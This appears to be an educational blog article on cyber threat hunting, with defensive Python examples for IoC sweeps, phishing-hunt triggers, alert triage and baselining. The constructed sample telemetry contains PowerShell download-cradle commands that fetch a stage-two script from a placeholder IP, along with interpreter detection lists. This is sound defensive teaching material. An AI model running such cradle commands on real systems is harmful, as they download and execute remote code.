
Cyber Threat Hunting: Types, Methodologies, Best Practices

Updated on 26 November, 2022


A cyber threat is a potential attack on, or damage to, a computer system, typically launched over a network. Cyber threat hunting is the practice of searching for threats that are already present in a network but have gone undetected; its purpose is to catch the malicious actors who slipped past the automated security defenses. With cyber attacks growing in number and sophistication, actively hunting for intruders, rather than only waiting for alerts, has become critical. If you want to build this skill set, we recommend earning a top Ethical Hacking certification and staying ahead of the crowd.

What is Cyber Threat Hunting?

Cyber threat hunting is the process of proactively looking for security threats that are hiding, unnoticed, inside an organization's network. It usually runs alongside or after the threat detection phase, in which an automated solution looks for known threats. Threat detection is a passive approach that continuously monitors network endpoints to flag anomalies, whereas threat hunting is an active approach that searches for threats the detection layer did not identify.

Cyber threat hunting does not wait for an Indicator of Compromise (IoC) alert to fire; instead, it follows a hypothesis-based approach backed by threat data to hunt down lurking threats, and in some cases produces new IoCs as its output.

Why Threat Hunting Is Needed Along with Threat Detection

Modern attacks grow more sophisticated every day, which means that some of them slip past automated threat detection solutions and sit unnoticed for days, weeks or months; Advanced Persistent Threats (APTs) are the typical example. Once inside, these attackers gather sensitive data such as confidential documents, internal IP addresses and login credentials, which they later use to extend their control over the environment.

It is often estimated that automated threat detection solutions together with SOC tier 1 and tier 2 analysts catch about 80% of threats; finding the remaining 20% early requires due diligence and a proactive hunting strategy.

Key Elements of Threat Hunting

The important elements of a threat hunting practice are identifying anomalies, analyzing those anomalies with suitable tools and techniques to decide whether they represent a threat, and finally remediating confirmed threats before the attacker can exploit them further. The next section explains how threat hunting works; since APTs are the threats hunters most often look for, it helps to first understand them in brief.

What is an APT? 

An advanced persistent threat is an attack in which the attacker aims to establish an illicit, long-term presence on a network in order to gather highly sensitive data. Executing an APT generally involves more complex attack vectors than a standard web application attack, and the targets, which are carefully chosen and researched, are typically large enterprises or government networks. Common motives for such intrusions include:

  1. Intellectual property (IP) theft (e.g., trade secrets or patents).
  2. Exfiltration of sensitive information (e.g., employee and customer private data).
  3. Denial-of-service (DoS) attacks that sabotage critical organizational infrastructure such as databases.

How does Cyber Threat Hunting Work?

One key point is that cyber threat hunting is a data-driven activity: it depends on the data generated by endpoint and network monitoring tools. Threat hunting goes beyond the regular SIEM (Security Information and Event Management) and EDR (Endpoint Detection and Response) workflow by adding a layer of human intelligence. Threat hunters work through these event logs to identify new attack patterns, guided by the hunting models (hypotheses) they have drafted.

Types of Threat Hunting

1. Structured

Structured hunting is driven by an Indicator of Attack (IoA) and by the tactics, techniques and procedures (TTPs) that attackers use. The hunter knows which behaviour to look for before the hunt starts.

2. Unstructured

Unstructured hunting starts from a trigger, typically an Indicator of Compromise (IoC). From that starting point, the hunter searches for related anomalies or patterns throughout the environment.

3. Situational

Situational hunting builds hypotheses from circumstances, such as vulnerabilities discovered during a network risk assessment. Entity-oriented leads are taken from crowdsourced attack data describing the latest TTPs of current threats, and the hunter then searches for those specific behaviours within the environment under investigation.

Threat Hunting Methodologies

A baseline is essential before building investigation models for threat hunting. Baselining means establishing what normal, non-malicious activity looks like, so that deviations from it (anomalies) can be identified. Some commonly used threat hunting methodologies are:

1. Hypothesis-driven Investigation

This is the most common hunting model. Hunters use a threat/attack library containing up-to-date Indicators of Attack (IoAs) and the latest TTPs, drawn from a large pool of crowdsourced attack data. Such libraries are commonly aligned with the MITRE ATT&CK framework. Using these IoAs and TTPs, the hunter proactively searches the environment for the corresponding behaviour.

2. Investigation Based on Known Indicators of Compromise or Indicators of Attack (IoA)

Intel-based hunting is a reactive approach that uses the latest IoCs (Indicators of Compromise) from threat intelligence sources, such as file hashes, IP addresses, domain names and URLs. It is typically performed once the SIEM raises an alert that matches an IoC.

3. Situational or Advanced Analytics and Machine Learning Investigations

In this method, hypotheses are derived from situational circumstances, such as geopolitical events or targeted attacks against the organization's sector. The investigation can combine the hypothesis-driven and intel-driven models, using both IoAs and IoCs, and is often supported by advanced analytics or machine learning over the collected data.
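Both the unstructured hunt described earlier and the intel-based investigation above start from an IoC. The Python below is an added example, not code from the original article: it takes a small constructed threat-intel feed (written "defanged", with `hxxp://` and `[.]`, as intel reports usually publish indicators), re-fangs the indicators, and sweeps constructed DNS, proxy, network-connection and process telemetry for matches. The feed entries, event records, hash and host names are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Constructed threat-intel feed (illustrative, not a real feed). Indicators are
# "defanged" the way intel reports publish them so they cannot be clicked.
INTEL_FEED = [
    {"type": "domain", "value": "update-check[.]example[.]net"},
    {"type": "ipv4",   "value": "203[.]0[.]113[.]45"},
    {"type": "url",    "value": "hxxps://cdn-assets[.]example[.]org/loader.ps1"},
    {"type": "sha256", "value": "0F9C3D7B" * 8},   # constructed hash, 64 hex chars
]

def refang(indicator: str) -> str:
    """Turn a defanged indicator back into the form that appears in telemetry."""
    s = indicator.strip().lower()
    for broken, fixed in (("[.]", "."), ("(.)", "."), ("{.}", "."), ("[:]", ":"), ("[@]", "@")):
        s = s.replace(broken, fixed)
    return re.sub(r"^hxxp(s?)://", r"http\1://", s)

def build_index(feed):
    """Group re-fanged indicators by type so each event is matched against the right set."""
    index = {}
    for ioc in feed:
        index.setdefault(ioc["type"], set()).add(refang(ioc["value"]))
    return index

# Constructed endpoint and network telemetry (one dict per event).
EVENTS = [
    {"host": "ws-017", "kind": "dns",     "query": "update-check.example.net"},
    {"host": "ws-017", "kind": "proxy",   "url": "https://cdn-assets.example.org/loader.ps1"},
    {"host": "ws-042", "kind": "netconn", "dst_ip": "203.0.113.45", "dst_port": 443},
    {"host": "ws-042", "kind": "process", "image": r"C:\Windows\Temp\svc.exe", "sha256": "0f9c3d7b" * 8},
    {"host": "ws-101", "kind": "dns",     "query": "login.microsoftonline.com"},
    {"host": "ws-101", "kind": "proxy",   "url": "https://update-check.example.net/ping"},
]

def match_event(ev, index):
    """Return (ioc_type, ioc) if the event touches a known indicator, else None."""
    domains, urls = index.get("domain", set()), index.get("url", set())
    if ev["kind"] == "dns":
        q = ev["query"].lower().rstrip(".")
        return ("domain", q) if q in domains else None
    if ev["kind"] == "proxy":
        url = ev["url"].lower()
        if url in urls:
            return ("url", url)
        host = urlsplit(url).hostname or ""
        return ("domain", host) if host in domains else None   # URL IoC miss, but its domain hits
    if ev["kind"] == "netconn":
        return ("ipv4", ev["dst_ip"]) if ev["dst_ip"] in index.get("ipv4", set()) else None
    if ev["kind"] == "process":
        h = ev["sha256"].lower()
        return ("sha256", h) if h in index.get("sha256", set()) else None
    return None

def sweep(events, feed):
    """Intel-based hunt: every event matching an IoC, plus the sorted set of hosts to investigate."""
    index = build_index(feed)
    hits = []
    for ev in events:
        m = match_event(ev, index)
        if m:
            hits.append({"host": ev["host"], "ioc_type": m[0], "ioc": m[1], "event": ev})
    return hits, sorted({h["host"] for h in hits})

if __name__ == "__main__":
    for hit in sweep(EVENTS, INTEL_FEED)[0]:
        print(hit["host"], hit["ioc_type"], hit["ioc"])
```

The point of the re-fanging step is that raw feed entries almost never match telemetry as published; the point of matching a URL indicator's domain against proxy traffic is that an attacker who rotates the path on the same host is still caught. The list of hosts returned is the trigger list for the investigation phase, not a verdict.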

Steps to Cyber Threat Hunting

A proactive cyber threat hunt generally involves the following steps:

1. Developing Hypothesis

A hunt typically begins with a threat hypothesis based on previously known threats, on known vulnerabilities, or on third-party threat intelligence describing the latest attacker TTPs (tactics, techniques and procedures). A clear hypothesis is what makes it possible to recognise the patterns and anomalies that lead to a detection.

2. Collect and Process Intelligence and Data

To test the hypothesis, the relevant data must be collected from endpoints and other sources across the environment. The data is then processed to see whether it contains anomalies that warrant a trigger.

3. Identifying Triggers

A trigger is a specific condition that calls for further investigation, for example when detection tooling reports unusual activity that may indicate malicious behaviour. Often, a hypothesis about a new attack or threat is itself the trigger for a proactive hunt.

4. Investigation

Once a trigger has been identified, the next step is to analyse the anomaly; if it is confirmed as malicious, it is turned into an IoC (Indicator of Compromise) or an IoA (Indicator of Attack). In this phase the threat hunter uses security datasets from tools such as the EDR (Endpoint Detection and Response) and the SIEM (Security Information and Event Management) to establish the scope of the intrusion and look for other affected systems.

5. Resolution

This is the final and most critical phase, after a potential Indicator of Attack (IoA) or Indicator of Compromise (IoC) has been identified. Here the threat hunter communicates the threat to the other stakeholders, such as the operations team, so that an appropriate incident response can be deployed as early as possible.

In many cases, security teams already have automated incident response solutions deployed which include a pre-configured list of steps for specific security conditions. How effective the resolution phase is depends heavily on the level of detail about the attack and the attacker that the hunter was able to establish.
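The five steps above, carried through end to end as one added Python example (not code from the original article). The hypothesis is that a phishing document launched a script interpreter from an Office process (MITRE ATT&CK T1566.001 leading to T1059.001); the data is a handful of constructed process-creation events in the style of Sysmon Event ID 1; the trigger is that hypothesis expressed as a query; the investigation decodes `-EncodedCommand` payloads, extracts network IoCs from them and pivots on those IoCs to find hosts the trigger alone would have missed; the resolution is a hand-off package for the response team. Host names, user names, the payload and the 203.0.113.45 address are all constructed for illustration.

```python
import base64
import re

# Step 1: hypothesis. Phishing documents commonly launch a script interpreter
# from the Office process itself (ATT&CK T1566.001 -> T1059.001). If that has
# happened, process telemetry should show an Office parent with a
# PowerShell/cmd child, often with an encoded command line.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

def encode_ps(cmd: str) -> str:
    """Only used to build realistic sample data: -EncodedCommand is base64 of UTF-16LE."""
    return base64.b64encode(cmd.encode("utf-16le")).decode()

# Step 2: collected data. Constructed process-creation events (Sysmon EID 1 style).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.45/stage2.ps1')"
EVENTS = [
    {"ts": "2022-11-20T09:01:12Z", "host": "ws-017", "user": "alice",
     "parent_image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -EncodedCommand {encode_ps(PAYLOAD)}"},
    {"ts": "2022-11-20T09:01:13Z", "host": "ws-017", "user": "alice",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"ts": "2022-11-20T09:15:40Z", "host": "ws-042", "user": "bob",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\inventory.ps1"},          # benign admin script
    {"ts": "2022-11-20T11:02:05Z", "host": "ws-088", "user": "carol",
     "parent_image": r"C:\Program Files\Microsoft Office\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell -ep bypass -c \"iwr http://203.0.113.45/stage2.ps1 -OutFile $env:TEMP\\s.ps1\""},
    {"ts": "2022-11-20T13:30:00Z", "host": "ws-120", "user": "dave",
     "parent_image": r"C:\Windows\System32\services.exe",                    # no Office parent: not a trigger
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -enc {encode_ps(PAYLOAD)}"},
]

def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

# Step 3: trigger. The hypothesis expressed as a query over the data.
def find_triggers(events):
    return [e for e in events
            if basename(e["parent_image"]) in OFFICE_PARENTS
            and basename(e["image"]) in INTERPRETERS]

# Step 4: investigation. Decode encoded commands and pull out network IoCs.
_ENC = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
_URL = re.compile(r"https?://[\w.\-]+(?::\d+)?(?:/[\w.\-/%]*)?", re.I)

def decode_cmdline(cmdline: str) -> str:
    """Return the plaintext behind -EncodedCommand, or the command line unchanged."""
    m = _ENC.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline   # keep the raw line if it was not really an encoded command

def extract_iocs(events):
    return {url.lower() for e in events for url in _URL.findall(decode_cmdline(e["cmdline"]))}

def pivot(events, iocs):
    """Scope the intrusion: every host whose command lines reference a known IoC."""
    return {e["host"] for e in events
            if any(ioc in decode_cmdline(e["cmdline"]).lower() for ioc in iocs)}

# Step 5: resolution. A hand-off package for the IR / operations team.
def run_hunt(events):
    triggers = find_triggers(events)
    iocs = extract_iocs(triggers)
    return {
        "hypothesis": "Office process spawning a script interpreter (T1566.001 -> T1059.001)",
        "triggered_hosts": sorted({e["host"] for e in triggers}),
        "iocs": sorted(iocs),
        "isolate": sorted(pivot(events, iocs)),
    }

if __name__ == "__main__":
    for k, v in run_hunt(EVENTS).items():
        print(f"{k}: {v}")
```

Two things this shows that the step list alone does not. First, the trigger fires on two hosts, but the investigation's pivot finds a third (ws-120) that ran the same payload from a service rather than from Office, so the resolution isolates three hosts, not two. Second, the encoded-command decoding is what turns a vague anomaly ("Word spawned PowerShell") into a concrete IoC (a staging URL) that the SIEM can block and alert on going forward.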

What’s Required to Start Threat Hunting?

1. Human Hunters (Cyber Security Experts)

An effective cyber threat hunting program needs seasoned cyber security personnel dedicated to hunting. Human judgement reaches a resolution in complex cases faster and with better accuracy than tooling alone. Generally, a security practitioner with solid cyber security knowledge and a relevant certification is a good fit for this role.

2. Organizational Model

Every organization must design the threat hunting model best suited to its own threat hunting process. Models should be based on the organization's specific threat hunting use cases.

3. Tools & Technology

Many organizations use endpoint security solutions for detection, response and investigation, together with the security monitoring and management tools, such as a SIEM, that their threat hunters rely on for further analysis.

4. Data 

Data is the key ingredient for establishing a baseline of system behaviour. That baseline of expected and authorized events is later used to identify anomalies.

Top Challenges of Cyber Threat Hunting

So far we have seen what cyber threat hunting is and how it works. Since threat hunting is a proactive activity, it comes with its own set of challenges. Some of the common ones an organization faces when implementing it are:

1. Deploying Seasoned Cyber Threat Hunters

The human capital involved in cyber threat hunting is arguably the most difficult part. Finding and retaining skilled cyber threat hunters is a constant challenge for any organisation.

2. Data Generation and Management

To efficiently identify hidden cyber threats, it is critical to gather security data, both current and historical, that provides visibility across the entire environment. Such data collection usually depends on commercial third-party tools, which must be configured to generate the data points that hunting needs.

3. Staying up-to-date With Threat Intelligence

Threat hunters must be equipped with the most up-to-date attacker TTPs (tactics, techniques and procedures) and threat intelligence, so that they can compare current attack trends with their organization's own security data. This is essential for building an effective threat hunting hypothesis model.

Need for Automation in Threat Hunting

The description above can make cyber threat hunting sound overwhelming. It does add human intelligence to the existing threat identification techniques, but there is plenty of scope to automate individual activities. Below are a few areas where automation can make hunting more efficient and sustainable.

1. Data Collection

Threat hunting investigations involve collecting many categories of data from a variety of endpoint sources. Done manually, it can take many hours to maintain, sort and parse these data into a normalized, usable format. Deploying automated collection utilities can greatly reduce the time required for collection, sorting and maintenance.

2. Investigation Process

A constantly high volume of alerts can overwhelm even the most experienced and well-staffed SOC. Automation can reduce false positives and noise by quickly categorizing threats as high, medium or low risk, which helps security teams prioritize their effort and address remediation efficiently.
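The two automation areas above, data normalization and alert triage, in one added Python example (not code from the original article, and not any vendor's output format). It parses constructed raw alerts in two made-up formats, a key=value firewall line and a JSON line from an EDR, into one common schema, collapses repeats of the same alert into a count, and scores each alert from its severity, the criticality of the affected asset and the repeat count, assigning a high/medium/low priority. The asset criticality table stands in for a CMDB lookup and is constructed, as are the thresholds and weights.

```python
import json
import re
from datetime import datetime, timezone

# Constructed raw alerts in two made-up vendor formats.
RAW = [
    "2022-11-20T09:01:12Z fw01 DENY src=10.0.5.17 dst=203.0.113.45 dpt=4444 proto=tcp",
    "2022-11-20T09:01:15Z fw01 DENY src=10.0.5.17 dst=203.0.113.45 dpt=4444 proto=tcp",
    "2022-11-20T09:01:18Z fw01 DENY src=10.0.5.17 dst=203.0.113.45 dpt=4444 proto=tcp",
    '{"time": 1668934872, "device": "ws-017", "rule": "Credential dumping (lsass access)", "sev": 9, "user": "alice"}',
    '{"time": 1668935000, "device": "ws-042", "rule": "PUA detected", "sev": 3, "user": "bob"}',
    "2022-11-20T09:10:00Z fw01 ALLOW src=10.0.5.30 dst=198.51.100.7 dpt=443 proto=tcp",
]

# Constructed asset-criticality lookup (0..1); ws-017 and its address 10.0.5.17
# are treated as a high-value workstation. Anything unknown defaults to 0.5.
ASSET_CRITICALITY = {"ws-017": 1.0, "10.0.5.17": 1.0, "ws-042": 0.5}

_FW = re.compile(r"^(?P<ts>\S+) (?P<sensor>\S+) (?P<action>ALLOW|DENY) (?P<kv>.*)$")

def normalize(line: str):
    """Map one raw line onto the common schema; None means 'not an alert, ignore'."""
    line = line.strip()
    if line.startswith("{"):                       # EDR: JSON, epoch time, severity 0..10
        d = json.loads(line)
        return {"ts": datetime.fromtimestamp(d["time"], tz=timezone.utc).isoformat(),
                "source": "edr", "asset": d["device"], "name": d["rule"],
                "severity": d["sev"] / 10, "key": (d["device"], d["rule"])}
    m = _FW.match(line)                            # firewall: text, key=value pairs
    if not m or m.group("action") != "DENY":
        return None                                # allowed traffic is logged, not alerted
    kv = dict(p.split("=", 1) for p in m.group("kv").split())
    return {"ts": m.group("ts"), "source": "firewall", "asset": kv["src"],
            "name": f"denied outbound to {kv['dst']}:{kv['dpt']}",
            "severity": 0.4, "key": (kv["src"], kv["dst"], kv["dpt"])}

def triage(lines):
    """Normalize, de-duplicate and score alerts; highest priority first."""
    merged = {}
    for line in lines:
        ev = normalize(line)
        if ev is None:
            continue
        if ev["key"] in merged:
            merged[ev["key"]]["count"] += 1        # same alert again: raise the count, not the noise
        else:
            merged[ev["key"]] = dict(ev, count=1)
    out = []
    for ev in merged.values():
        crit = ASSET_CRITICALITY.get(ev["asset"], 0.5)
        repeat = min(1 + 0.1 * (ev["count"] - 1), 1.5)   # repeats matter, but cap the boost
        ev["score"] = round(ev["severity"] * (0.5 + 0.5 * crit) * repeat, 2)
        ev["priority"] = "high" if ev["score"] >= 0.7 else "medium" if ev["score"] >= 0.3 else "low"
        out.append(ev)
    return sorted(out, key=lambda e: -e["score"])

if __name__ == "__main__":
    for a in triage(RAW):
        print(f'{a["priority"]:6} {a["score"]:.2f} x{a["count"]} {a["asset"]:10} {a["name"]}')
```

With the sample input the three identical firewall denies become one medium alert with a count of 3, the lsass-access detection on the high-value workstation comes out on top, and the PUA alert on an ordinary host drops to low. The weights are deliberately simple; the design point is that priority is a function of asset value and repetition, not of vendor severity alone.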

3. Response Process

As discussed above, many commercial incident response solutions can be configured with pre-defined remediation steps. Automated responses can handle the smaller, more routine cases, such as running a script to isolate a compromised endpoint, deleting malicious files after isolation, and restoring data from backups after an attack.

Tips and Best Practices to Improve Threat Hunting

1. Identify your Organization’s “normal”

This means first baselining the normal, expected behaviour of the organization's systems, and only then looking for anomalies against that baseline.
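The baselining that this tip, the methodology section and the "Data" requirement all rely on can be made concrete with a least-frequency (stacking) analysis over process telemetry. The Python below is an added example, not code from the original article: it counts on how many hosts each executable path ran during a constructed 30-day baseline, does the same for a constructed hunt window, and reports only the rare paths, ranking a known binary name running from a new location above a never-seen executable, and a tool that was rare in the baseline too below both. All hosts, paths and the `max_hosts` threshold are constructed.

```python
from collections import defaultdict

def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

# Constructed telemetry: (host, image path) pairs summarising which executables
# ran on which host. BASELINE = the period the organisation considers "normal".
HOSTS = [f"ws-{i:03d}" for i in range(1, 41)]
COMMON = [r"C:\Windows\System32\svchost.exe", r"C:\Windows\explorer.exe",
          r"C:\Program Files\Microsoft Office\WINWORD.EXE",
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"]
BASELINE = [(h, img) for h in HOSTS for img in COMMON]
BASELINE += [("ws-001", r"C:\Tools\Sysinternals\procexp.exe")]   # one admin's tool: rare but normal

HUNT_WINDOW = [(h, img) for h in HOSTS for img in COMMON[:2]]
HUNT_WINDOW += [
    ("ws-001", r"C:\Tools\Sysinternals\procexp.exe"),        # still rare, still normal
    ("ws-017", r"C:\Users\Public\svchost.exe"),               # known name, wrong place
    ("ws-042", r"C:\Users\bob\AppData\Local\Temp\upd.exe"),   # never seen anywhere before
]

def stack(events):
    """Host prevalence per image path: which distinct hosts ran each path."""
    hosts_by_path = defaultdict(set)
    for host, path in events:
        hosts_by_path[path.lower()].add(host)
    return hosts_by_path

def hunt_outliers(baseline, window, max_hosts=2):
    """Rare paths in the hunt window, judged against the baseline, most suspicious first."""
    base, cur = stack(baseline), stack(window)
    base_paths_by_name = defaultdict(set)
    for path in base:
        base_paths_by_name[_basename(path)].add(path)

    findings = []
    for path, hosts in cur.items():
        if len(hosts) > max_hosts:
            continue                                   # widely run this period: part of "normal"
        name = _basename(path)
        if path in base:
            if len(base[path]) > max_hosts:
                continue                               # common in the baseline, just quieter now
            severity, reason = "low", "rare, but rare in the baseline too"
        elif name in base_paths_by_name:
            severity, reason = "high", f"known name {name} running from a path never seen in baseline"
        else:
            severity, reason = "medium", "executable never seen in baseline"
        findings.append({"path": path, "hosts": sorted(hosts), "severity": severity, "reason": reason})

    order = {"high": 0, "medium": 1, "low": 2}
    return sorted(findings, key=lambda f: (order[f["severity"]], f["path"]))

if __name__ == "__main__":
    for f in hunt_outliers(BASELINE, HUNT_WINDOW):
        print(f'{f["severity"]:6} {f["path"]} on {", ".join(f["hosts"])}: {f["reason"]}')
```

The 40 hosts running `svchost.exe` from `System32` never appear in the output; the single host running a file of the same name from `C:\Users\Public` is the first line. That is the whole value of a baseline: the anomaly is not "svchost.exe ran", it is "svchost.exe ran from somewhere it never has".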

2. Observe, Orient, Decide, Act (OODA)

This is a workflow for a successful threat hunting practice: first observe the environment for anomalies, then orient by structuring and assessing the identified risks, then decide on the actions required to address them, and finally act by executing those actions.

3. Have Appropriate and Sufficient Resources

To carry out all the above actions effectively and efficiently, we need access to the required resources: trained professionals and analytical software tools. There are plenty of cyber security certification courses online that can help keep a team job-ready.

Conclusion

In the sections above we saw what cyber threat hunting is, why it matters and how it is implemented. Threat hunting is an active approach, whereas threat detection is a passive one. Threat hunting adds human intelligence, creating threat hypotheses to identify malicious activity and threats. Data plays a key role in every step, from baselining and hypothesis creation through investigation to remediation. KnowledgeHut's top Ethical Hacking certification will help you land a job at top companies.

Frequently Asked Questions (FAQs)

1. How do I become a good threat hunter?

A good threat hunter should have strong technical and analytical skills applied to cyber security problems, and enough hands-on experience with threat intelligence tools and solutions.

2. How do you do a cyber threat hunt?

First, a hypothesis is created; then, using this hypothesis, the environment is analyzed for anomalies that may indicate a cyber threat. Once a threat is identified, action should be taken to remediate it as early as possible.

3. What's the difference between threat hunting and threat intelligence?

Threat intelligence is a data set about attempted or successful intrusions, usually collected and analyzed by automated security systems with machine learning and AI.

Threat hunting uses that intelligence to carry out a thorough, environment-wide search for bad actors. In other words, threat hunting begins where threat intelligence ends. Moreover, a successful threat hunt can identify threats that have not yet been spotted in the wild.

4. What are threat hunting techniques?

Threat hunting techniques are the hunting models used during analysis. The common techniques in use are:

  1. Hypothesis-driven investigation
  2. Intel-based investigation
  3. Situational investigation